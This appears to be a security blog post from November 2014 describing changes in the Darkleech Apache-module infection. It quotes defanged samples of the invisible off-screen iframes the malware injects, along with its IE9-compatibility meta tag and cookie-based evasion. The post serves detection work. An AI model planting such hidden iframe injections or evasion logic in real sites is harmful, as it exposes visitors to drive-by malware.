Darkleech Update – November 2014

Just wanted to document some latest changes in Darkleech behavior that may help you detect it.

I’d like to thank internet security enthusiasts who share their findings with me. Without you, I could have easily missed these new (?) details.

Quick recap

Darkleech is a root level server infection that installs malicious Apache modules. The modules inject invisible iframes into server response when it is already prepared (linebreaks added for readability).

<style>.a4on6mz5h { position:absolute; left:-1376px; top:-1819px} </style> <div class="a4on6mz5h">
<ifr ame src="hxxp://tfmjst .hopto .org/nsiumkogckv1tv4locfzyv2eykqss9ltfb9wnmhfqz1ol2" width="247" height="557"></ifram e></div>

All the elements of this code are random and auto-generated on the fly (style name, coordinates, iframe diminsions, URL paths). Moreover, the iframe domains change every few minutes — lately hackers prefer free No-IP.com dynamic DNS hostnames like hopto.org, ddns.net, myftp.biz, myftp.org, serveftp.com, servepics.com, etc.

This infection is hard to detect as it only shows up once per IP per day (or maybe even more seldom). And since it works on a low system level, it can detect if server admins are logged in, so it lurks until they log out — this means that they won’t see anything even if they monitor outgoing TCP traffic.

For more details, please check the links at the bottom of this post.

What’s new?


Recently, I’ve been pointed at the fact that now Darkleech also adds the following meta tag setting IE 9 compatibility mode in Internet Explorer. It looks like it searches for the </head> tag and replaces it with the following code (again, linebreaks added for readability):

<meta http-equiv='x-ua-compatible' content='IE=EmulateIE9'></head>
<style>.syxq9la69 { position:absolute; left:-1666px; top:-1634px} </style> <div class="syxq9la69">
<iframe src="hxxp://jsnrgo .ddns .net/nsiumkogckv1tv4locfzyv2eykqss9ltfb9wnmhfqz1ol2" width="285" height="554"></iframe></div>

This IE=EmulateIE9 instruction tells modern versions of Internet Explorer to render a web page as if they were IE 9, using all the features that has been deprecated in IE 10 and newer versions of IE. Some of the legacy features are known to have vulnerabilities and hackers try to exploit them turning the compatibility mode on (e.g. VML-related exploit)

_SESSION_ID cookie

In addition to temporary IP blacklisting, Darkleech also uses the _SESSION_ID cookie that expires in one week. It adds the following cookie into response headers:

Set-Cookie: _SESSION_ID=-1; expires=Wed 03-Dec-2014 09:32:48 GMT; path=/

So even if you change your IP address (e.g. if you have a dynamic IP address) you still won’t see malware for the following 7 days. So don’t forget to clear/block cookies if you are trying to reproduce infected response.

Most likely the IP blacklisting also works for one week now too.

Just a couple of more things:

  • As you might have figured out, it looks for Internet Explorer User-Agent (and derivatives like Maxthon, Avant).
  • Referer is not important at the moment. I managed to trigger it even without the Referer header.

That’s it for today. Please let me know if you have some other news about Darkleech.

Previous posts about Darkleech:


Share this post

Share on facebook
Share on linkedin
Share on print
Share on email

Subscribe to our Monthly Cyber Security Digest

Get monthly content to keep you up to date on the latest news and tips